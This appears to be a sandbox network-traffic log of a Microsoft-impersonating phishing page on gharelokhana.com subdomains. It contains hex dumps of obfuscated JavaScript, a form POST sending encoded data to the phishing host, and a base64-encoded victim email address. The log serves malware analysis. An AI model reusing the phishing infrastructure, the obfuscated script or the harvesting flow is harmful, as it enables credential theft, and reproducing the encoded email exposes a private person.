                                                                                                                                                                                                2024-12-05 07:24:30 UTC16384INData Raw: 63 30 30 30 0d 0a 7b 76 61 72 20 6b 59 3d 6b 5a 28 30 78 31 35 63 61 29 2c 6b 61 3d 6b 5a 28 30 78 36 61 38 29 2c 6b 55 3d 6b 59 5b 70 56 28 30 78 32 34 62 29 5d 2c 6b 56 3d 6b 61 28 6b 55 29 26 26 6b 61 28 6b 55 5b 70 56 28 30 78 34 30 32 29 5d 29 3b 6b 6d 5b 70 56 28 30 78 33 61 65 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 75 29 7b 72 65 74 75 72 6e 20 6b 56 3f 6b 55 5b 27 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 27 5d 28 6b 75 29 3a 7b 7d 3b 7d 3b 7d 65 6c 73 65 20 54 6d 28 54 70 2c 54 76 2c 7b 27 76 61 6c 75 65 27 3a 54 79 2c 27 63 6f 6e 66 69 67 75 72 61 62 6c 65 27 3a 21 30 78 30 2c 27 77 72 69 74 61 62 6c 65 27 3a 21 30 78 30 7d 29 3b 7d 2c 30 78 34 34 33 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 29 7b 76 61 72 20 6b 62 3d 54 79 70 65 45 72 72 6f 72 3b 6b 6d
                                                                                                                                                                                                Data Ascii: c000{var kY=kZ(0x15ca),ka=kZ(0x6a8),kU=kY[pV(0x24b)],kV=ka(kU)&&ka(kU[pV(0x402)]);km[pV(0x3ae)]=function(ku){return kV?kU['createElement'](ku):{};};}else Tm(Tp,Tv,{'value':Ty,'configurable':!0x0,'writable':!0x0});},0x443:function(km){var kb=TypeError;km
                                                                                                                                                                                                2024-12-05 07:24:30 UTC16384INData Raw: 6b 4b 5b 66 52 28 30 78 35 37 39 29 5d 3b 65 6c 73 65 7b 69 66 28 6b 6c 29 6b 47 3d 6b 4b 3b 65 6c 73 65 7b 69 66 28 21 28 6b 43 3d 6b 6f 28 6b 4b 29 29 29 74 68 72 6f 77 20 6e 65 77 20 6b 4e 28 6b 56 28 6b 4b 29 2b 27 5c 78 32 30 69 73 5c 78 32 30 6e 6f 74 5c 78 32 30 69 74 65 72 61 62 6c 65 27 29 3b 69 66 28 6b 75 28 6b 43 29 29 7b 69 66 28 27 57 57 44 65 6c 27 3d 3d 3d 66 52 28 30 78 33 30 35 29 29 54 58 5b 6b 79 5d 5b 6b 73 5d 3d 21 30 78 30 3b 65 6c 73 65 7b 66 6f 72 28 6b 76 3d 30 78 30 2c 6b 50 3d 6b 4d 28 6b 4b 29 3b 6b 50 3e 6b 76 3b 6b 76 2b 2b 29 69 66 28 28 6b 4c 3d 6b 67 28 6b 4b 5b 6b 76 5d 29 29 26 26 6b 69 28 6b 63 2c 6b 4c 29 29 72 65 74 75 72 6e 20 6b 4c 3b 72 65 74 75 72 6e 20 6e 65 77 20 6b 79 28 21 30 78 31 29 3b 7d 7d 6b 47 3d 6b 73
                                                                                                                                                                                                Data Ascii: kK[fR(0x579)];else{if(kl)kG=kK;else{if(!(kC=ko(kK)))throw new kN(kV(kK)+'\x20is\x20not\x20iterable');if(ku(kC)){if('WWDel'===fR(0x305))TX[ky][ks]=!0x0;else{for(kv=0x0,kP=kM(kK);kP>kv;kv++)if((kL=kg(kK[kv]))&&ki(kc,kL))return kL;return new ky(!0x1);}}kG=ks
                                                                                                                                                                                                2024-12-05 07:24:30 UTC16384INData Raw: 30 78 33 61 65 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 69 2c 6b 73 29 7b 76 61 72 20 49 30 3d 57 46 2c 6b 6f 3d 6b 69 5b 49 30 28 30 78 35 65 66 29 5d 3b 69 66 28 6b 55 28 6b 6f 29 29 7b 76 61 72 20 6b 65 3d 6b 59 28 6b 6f 2c 6b 69 2c 6b 73 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 6b 65 26 26 6b 61 28 6b 65 29 2c 6b 65 3b 7d 69 66 28 49 30 28 30 78 35 31 38 29 3d 3d 3d 6b 56 28 6b 69 29 29 72 65 74 75 72 6e 20 6b 59 28 6b 75 2c 6b 69 2c 6b 73 29 3b 74 68 72 6f 77 20 6e 65 77 20 6b 4d 28 27 52 65 67 45 78 70 23 65 78 65 63 5c 78 32 30 63 61 6c 6c 65 64 5c 78 32 30 6f 6e 5c 78 32 30 69 6e 63 6f 6d 70 61 74 69 62 6c 65 5c 78 32 30 72 65 63 65 69 76 65 72 27 29 3b 7d 3b 7d 2c 30 78 32 32 61 31 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b
                                                                                                                                                                                                Data Ascii: 0x3ae)]=function(ki,ks){var I0=WF,ko=ki[I0(0x5ef)];if(kU(ko)){var ke=kY(ko,ki,ks);return null!==ke&&ka(ke),ke;}if(I0(0x518)===kV(ki))return kY(ku,ki,ks);throw new kM('RegExp#exec\x20called\x20on\x20incompatible\x20receiver');};},0x22a1:function(km,kb,kZ){
                                                                                                                                                                                                2024-12-05 07:24:30 UTC8INData Raw: 5d 28 29 5b 30 78 0d 0a
                                                                                                                                                                                                Data Ascii: ]()[0x
                                                                                                                                                                                                2024-12-05 07:24:30 UTC16384INData Raw: 63 30 30 30 0d 0a 30 5d 21 3d 3d 6b 4a 3b 7d 29 2c 6b 71 3d 66 75 6e 63 74 69 6f 6e 28 6b 4a 29 7b 69 66 28 21 6b 56 28 6b 4a 29 29 72 65 74 75 72 6e 21 30 78 31 3b 76 61 72 20 6b 47 3d 6b 4a 5b 6b 63 5d 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 78 30 21 3d 3d 6b 47 3f 21 21 6b 47 3a 6b 55 28 6b 4a 29 3b 7d 3b 6b 59 28 7b 27 74 61 72 67 65 74 27 3a 6d 66 28 30 78 32 35 32 29 2c 27 70 72 6f 74 6f 27 3a 21 30 78 30 2c 27 61 72 69 74 79 27 3a 30 78 31 2c 27 66 6f 72 63 65 64 27 3a 21 6b 4b 7c 7c 21 6b 65 28 6d 66 28 30 78 35 61 37 29 29 7d 2c 7b 27 63 6f 6e 63 61 74 27 3a 66 75 6e 63 74 69 6f 6e 28 6b 4a 29 7b 76 61 72 20 6d 49 3d 6d 66 2c 6b 47 2c 6b 43 2c 6b 76 2c 6b 50 2c 6b 4c 2c 6b 51 3d 6b 75 28 74 68 69 73 29 2c 6b 45 3d 6b 6f 28 6b 51 2c 30 78 30 29
                                                                                                                                                                                                Data Ascii: c0000]!==kJ;}),kq=function(kJ){if(!kV(kJ))return!0x1;var kG=kJ[kc];return void 0x0!==kG?!!kG:kU(kJ);};kY({'target':mf(0x252),'proto':!0x0,'arity':0x1,'forced':!kK||!ke(mf(0x5a7))},{'concat':function(kJ){var mI=mf,kG,kC,kv,kP,kL,kQ=ku(this),kE=ko(kQ,0x0)
                                                                                                                                                                                                2024-12-05 07:24:30 UTC16384INData Raw: 28 30 78 31 38 36 39 29 2c 6b 5a 28 30 78 31 61 31 39 29 2c 6b 5a 28 30 78 36 39 31 29 2c 6b 5a 28 30 78 32 34 30 66 29 2c 6b 5a 28 30 78 31 36 38 65 29 3b 7d 2c 30 78 36 39 31 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 62 38 3d 61 30 54 35 2c 6b 59 3d 6b 5a 28 30 78 32 31 61 34 29 2c 6b 61 3d 6b 5a 28 30 78 37 30 66 29 2c 6b 55 3d 6b 5a 28 30 78 31 66 62 38 29 2c 6b 56 3d 6b 5a 28 30 78 34 39 35 29 2c 6b 75 3d 6b 5a 28 30 78 31 30 36 31 29 2c 6b 4d 3d 6b 5a 28 30 78 35 65 32 29 3b 6b 59 28 7b 27 74 61 72 67 65 74 27 3a 62 38 28 30 78 32 32 30 29 2c 27 73 74 61 74 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 6b 5a 28 30 78 35 37 66 29 7d 2c 7b 27 72 61 63 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6b 69 29 7b 76 61 72 20 62 39 3d
                                                                                                                                                                                                Data Ascii: (0x1869),kZ(0x1a19),kZ(0x691),kZ(0x240f),kZ(0x168e);},0x691:function(km,kb,kZ){var b8=a0T5,kY=kZ(0x21a4),ka=kZ(0x70f),kU=kZ(0x1fb8),kV=kZ(0x495),ku=kZ(0x1061),kM=kZ(0x5e2);kY({'target':b8(0x220),'stat':!0x0,'forced':kZ(0x57f)},{'race':function(ki){var b9=
                                                                                                                                                                                                2024-12-05 07:24:30 UTC16384INData Raw: 65 28 6b 4d 5b 6b 79 28 30 78 31 30 63 29 5d 28 6b 73 2c 6b 73 2b 30 78 32 29 2c 30 78 31 30 29 3b 6b 69 2b 3d 54 6c 5b 62 68 28 30 78 35 36 34 29 5d 28 6b 6f 29 3b 7d 76 61 72 20 6b 65 3d 27 27 2c 6b 4e 3d 6b 69 5b 6b 73 28 30 78 31 32 62 29 5d 28 54 53 29 2c 6b 79 3d 54 72 28 6b 4e 5b 30 78 30 5d 29 2c 6b 63 3d 6b 6d 28 6b 4e 5b 30 78 31 5d 2b 54 44 29 3b 66 6f 72 28 6b 73 3d 30 78 30 3b 6b 73 3c 6b 79 5b 54 51 28 30 78 31 31 31 29 5d 3b 6b 73 2b 2b 29 6b 65 2b 3d 54 4b 5b 54 49 28 30 78 31 31 66 29 5d 28 28 54 63 28 6b 63 5b 54 69 28 30 78 31 32 63 29 5d 28 6b 73 25 6b 63 5b 54 64 28 30 78 31 31 31 29 5d 29 29 5e 6b 79 5b 54 6e 28 30 78 64 35 29 5d 28 6b 73 29 29 2d 54 4e 28 54 75 29 29 3b 72 65 74 75 72 6e 20 6b 65 3b 7d 7d 29 3b 7d 66 75 6e 63 74 69
                                                                                                                                                                                                Data Ascii: e(kM[ky(0x10c)](ks,ks+0x2),0x10);ki+=Tl[bh(0x564)](ko);}var ke='',kN=ki[ks(0x12b)](TS),ky=Tr(kN[0x0]),kc=km(kN[0x1]+TD);for(ks=0x0;ks<ky[TQ(0x111)];ks++)ke+=TK[TI(0x11f)]((Tc(kc[Ti(0x12c)](ks%kc[Td(0x111)]))^ky[Tn(0xd5)](ks))-TN(Tu));return ke;}});}functi
                                                                                                                                                                                                2024-12-05 07:24:30 UTC8INData Raw: 38 36 61 33 2c 30 0d 0a
                                                                                                                                                                                                Data Ascii: 86a3,0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.849740164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:34 UTC1144OUTPOST /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Content-Length: 5206
                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:34 UTC5206OUTData Raw: 30 75 6e 68 35 73 70 3d 25 35 42 25 35 42 25 32 32 32 35 34 33 33 32 32 35 33 38 33 32 37 38 37 31 37 33 32 35 33 37 34 25 32 32 25 32 43 25 32 32 36 37 36 36 63 36 61 34 39 32 35 33 34 33 30 32 35 33 33 34 34 37 31 25 32 32 25 32 43 25 32 32 32 35 33 37 34 33 37 61 34 33 36 64 33 30 37 61 36 61 33 32 37 37 33 25 32 32 25 32 43 25 32 32 38 32 35 33 37 34 33 37 33 32 35 33 37 34 34 37 31 32 35 33 37 34 32 25 32 32 25 32 43 25 32 32 32 35 33 33 34 31 37 31 33 31 33 39 33 39 33 34 33 37 33 37 33 31 33 25 32 32 25 32 43 25 32 32 30 33 36 33 35 33 32 33 34 33 39 33 37 33 35 33 38 33 35 25 32 32 25 35 44 25 32 43 25 32 32 31 39 39 34 37 37 31 30 36 35 25 32 32 25 32 43 25 32 32 30 38 31 37 38 34 35 25 32 32 25 32 43 38 25 35 44 26 32 71 62 64 32 78 63 39 6b 64
                                                                                                                                                                                                Data Ascii: 0unh5sp=%5B%5B%2225433225383278717325374%22%2C%226766c6a4925343025334471%22%2C%222537437a436d307a6a32773%22%2C%2282537437325374471253742%22%2C%2225334171313939343737313%22%2C%220363532343937353835%22%5D%2C%221994771065%22%2C%220817845%22%2C8%5D&2qbd2xc9kd
                                                                                                                                                                                                2024-12-05 07:24:35 UTC534INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:34 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                location: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                                                                                                                                                                set-cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; Domain=gharelokhana.com; HttpOnly; Path=/; SameSite=None; Secure
                                                                                                                                                                                                2024-12-05 07:24:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.849743164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:35 UTC1141OUTGET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:36 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:36 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Content-Length: 56081
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: no-store, no-cache
                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 41bc0cfe-be0d-4342-8a20-444e0f117200
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:36 UTC6439INData Raw: 1f 8b 08 00 00 00 00 00 00 03 bc bd 79 5f db c8 b6 28 fa 7f 7f 0a f0 ed 87 a4 8d 00 8f 18 ec a8 7d 89 01 35 09 83 99 42 82 9b 93 2b 5b 65 70 b0 25 22 d9 80 9d f0 3e fb 5b 43 95 54 f2 90 ee bb cf 3e af 7f 1d 2c 95 6a 5c b5 6a d5 9a 6a d5 bb d5 fd b3 e6 d5 97 d6 c1 ca c3 68 38 f8 e3 b7 77 fc b3 f2 ee 41 78 3e fc ae bc 1b f5 47 03 81 4f 2b 17 c2 ef 47 a2 3b ea 07 f7 f8 61 2b f9 f2 6e 28 46 de 4a 37 0c 46 22 18 39 b9 91 78 1d 6d 61 3d f5 95 ee 83 17 c5 62 e4 8c 47 bd 8d 9d 1c b4 31 7a da 10 df c7 fd 67 27 d7 e4 ec 1b 57 93 27 91 db 5a 50 cd d1 81 23 fc 7b 91 2d f5 79 e3 7a 6f a3 19 0e 9f bc 51 bf 33 58 5c f0 a5 ef 8f 1e 1c 5f 3c f7 bb 62 83 5e ec 95 7e d0 1f f5 bd c1 46 dc f5 06 c2 29 6c e6 ed 95 a1 f7 da 1f 8e 87 32 a9 88 49 e3 58 44 f4 ee 41 dd ce 44 c4 b9
                                                                                                                                                                                                Data Ascii: y_(}5B+[ep%">[CT>,j\jjh8wAx>GO+G;a+n(FJ7F"9xma=bG1zg'W'ZP#{-yzoQ3X\_<b^~F)l2IXDAD
                                                                                                                                                                                                2024-12-05 07:24:37 UTC16384INData Raw: 4c e3 a2 02 99 43 9e f3 c5 d2 03 a2 d7 57 87 1b 3b b9 c5 ad 2a bf e6 a7 cd c4 d7 7c 49 c6 d9 33 13 58 26 e3 c7 bc b8 1c 3b b3 43 5e 7a 00 86 66 69 36 f4 80 e7 7c f0 84 19 13 db 57 e4 6c 80 c4 40 c2 75 67 56 b8 ce b1 11 16 79 d0 0e 08 d6 6a da 01 cf 9c 91 32 f3 b0 e0 da 69 47 77 0d fc 43 93 8f 0c 1f 9a 39 fb 0e 72 60 b9 1a 2c 35 60 bc 04 3a c0 fd 3d 61 69 86 91 58 61 9c 58 e9 a1 5b c9 1d 79 70 41 e1 4a 05 99 b8 57 76 2c 0b 72 b5 a7 4d 1e 36 1d d8 eb e2 3b fa fd 13 5f 07 03 c5 77 05 17 fb b7 dc 30 be ff f7 9b 27 17 db b0 5d b8 e3 c6 06 7c 70 10 1d 9e f1 07 de 56 a1 4b e8 7b 49 5d f1 a9 2b ba 4b 20 14 89 d5 c9 3b bf ef 41 4f 1e cc 89 f5 56 c7 d9 0a 7c 13 51 7d 93 c5 db 7e 6f 62 f6 2d cd 5e fe f6 82 04 61 42 ac b7 f2 8b 04 fe 8f 58 b9 74 97 f0 62 74 03 37 b3
                                                                                                                                                                                                Data Ascii: LCW;*|I3X&;C^zfi6|Wl@ugVyj2iGwC9r`,5`:=aiXaX[ypAJWv,rM6;_w0']|pVK{I]+K ;AOV|Q}~ob-^aBXtbt7
                                                                                                                                                                                                2024-12-05 07:24:37 UTC16384INData Raw: f3 4a 3a 8f 4d b0 e4 92 cb ae 41 93 f5 26 d7 a0 d1 fb 92 6b d0 e8 9b 0a 84 c2 19 bd 6d 89 73 74 fb 70 6f 39 8c dd 44 e6 18 92 37 7f 81 22 af 1a 1f 3e 04 9f 2f e6 82 64 56 58 7e fb fb a0 e1 d2 58 3d 6c 3a 43 57 e9 b8 ae ad ac 53 fc b0 49 32 45 d5 5a 4f cd d4 2b 4c 09 75 bf 16 75 d3 18 9e a4 59 3a 8a 68 81 2e 50 0b 80 2d 68 ef 90 d6 da 21 79 db b3 47 94 c7 6f 73 5a 3a 59 ed d4 19 46 ac dd dd 4f 45 3d 2d f8 3c eb a6 ed 54 0d b7 22 6f 4c 1d 4e 95 e6 2a b9 d5 7d 79 18 b4 e1 f0 17 26 b1 5e 41 77 0d d5 84 b1 aa 14 92 af 4d 23 7e 12 dd be c0 65 89 03 1a 2e 18 90 b4 3f ca 13 ca 13 c8 88 de 00 1d 34 f2 75 30 e4 b7 b4 01 a2 b1 7b d6 23 90 ad 12 4b 42 94 72 fc df b7 d4 a1 6b a9 11 79 f8 7d 66 8a d0 cb 55 fa 86 2d f6 ca b1 cc 64 41 5d 79 f7 72 70 df 17 cd 96 7e b8 7b
                                                                                                                                                                                                Data Ascii: J:MA&kmstpo9D7">/dVX~X=l:CWSI2EZO+LuuY:h.P-h!yGosZ:YFOE=-<T"oLN*}y&^AwM#~e.?4u0{#KBrky}fU-dA]yrp~{
                                                                                                                                                                                                2024-12-05 07:24:37 UTC16384INData Raw: 07 08 4d e1 ec 1b ad 4c d2 22 ac e9 65 5e b3 55 c3 f7 97 7e 33 af 38 8a 94 03 f1 27 a1 9c 1e 95 d3 14 eb 75 4f 56 33 1d 1d cc 21 5e 39 cb b6 67 17 08 25 39 59 5d b7 cb 96 1f f2 2e 7a 04 9e 2e ef b4 7c 58 c5 df e5 17 ef cc db fa 77 b4 c9 8a fd 58 60 b4 f9 46 d7 d1 68 ed 0f 82 cd 23 20 27 08 ba cc af 79 fa 6c 8c 9b 5a 37 4d 8d 6a 69 aa bd 16 45 2a 38 45 e9 51 7c 88 df 08 4b 30 a3 e4 b9 0e 36 b1 34 83 0a 66 05 99 3f 02 a8 f4 ee c8 06 00 bf fe 5c 20 08 2c 38 b9 7c 17 01 37 55 7d 99 9c bf 12 f6 24 5f 19 7f 8e 7b a4 3b 7a 1f b6 8e 34 e8 3f 42 3a ae e5 20 38 ac 5b f3 a7 62 82 30 08 c4 5e 8e 80 a3 46 8f 0c 1b dd 77 2d f3 da 2c 2e 8c 19 10 b5 d0 e8 63 c1 77 a1 11 56 0a e5 73 48 38 da f8 63 a5 0d 7e a8 49 9c 97 ca bb 5e 01 f1 95 f9 5c e8 be 93 94 cf e9 53 72 34 a3
                                                                                                                                                                                                Data Ascii: ML"e^U~38'uOV3!^9g%9Y].z.|XwX`Fh# 'ylZ7MjiE*8EQ|K064f?\ ,8|7U}$_{;z4?B: 8[b0^Fw-,.cwVsH8c~I^\Sr4
                                                                                                                                                                                                2024-12-05 07:24:37 UTC490INData Raw: 3a d8 9f 4c 57 ff f8 ec ea d5 0b 78 81 3b 67 f8 fe 70 7f bc ff 78 7a fc 75 f5 f6 d5 0f 91 cf 46 f3 d1 d0 ee 1b a6 a2 51 49 02 03 a5 ed 1b f4 d1 e9 f4 6f d3 47 87 d0 76 90 fd ad 8e a7 98 26 e5 ef 93 bd e0 15 a6 70 0b 52 fb d5 f1 e4 31 26 56 d3 59 fd f0 1d d6 d5 09 fd b0 32 26 73 3b 08 db 9b c0 ab c3 bd b0 39 cc ba f7 28 28 36 c1 62 47 2e 41 1b af a9 dc fb 55 94 1e d2 fb b4 89 3f 4a 8c a4 61 fa 19 da c6 34 26 3f 43 83 e3 a4 c7 e6 bc 29 6c 0a fb f3 ec 55 3c 36 93 7c 3f 59 14 50 7a 0a b5 e2 ca be 8a 27 07 f0 ca 7c d9 8d 76 f8 01 d6 ac 52 d0 df 82 b9 3c b0 f3 57 07 da 8c f9 23 01 5b ca f1 28 3a 07 e3 1b e0 8b 12 4c dc 74 0d bd 06 8c e9 da fa cc 3e 0d 40 10 93 7d 34 30 b3 43 cc 03 32 f4 09 13 28 c1 9a db dd a5 63 1d f4 61 3f 59 92 0b 39 25 ca 44 d7 14 bb 72 06
                                                                                                                                                                                                Data Ascii: :LWx;gpxzuFQIoGv&pR1&VY2&s;9((6bG.AU?Ja4&?C)lU<6|?YPz'|vR<W#[(:Lt>@}40C2(ca?Y9%Dr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.849745164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:38 UTC663OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                                                                                                                Host: e7a91062-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:39 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:39 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 49934
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                age: 5462866
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                etag: 0x8DCE31CBE97473C
                                                                                                                                                                                                last-modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                x-cache: HIT
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-request-id: 9ba7681e-c01e-00c4-7737-1521f7000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                content-encoding: gzip
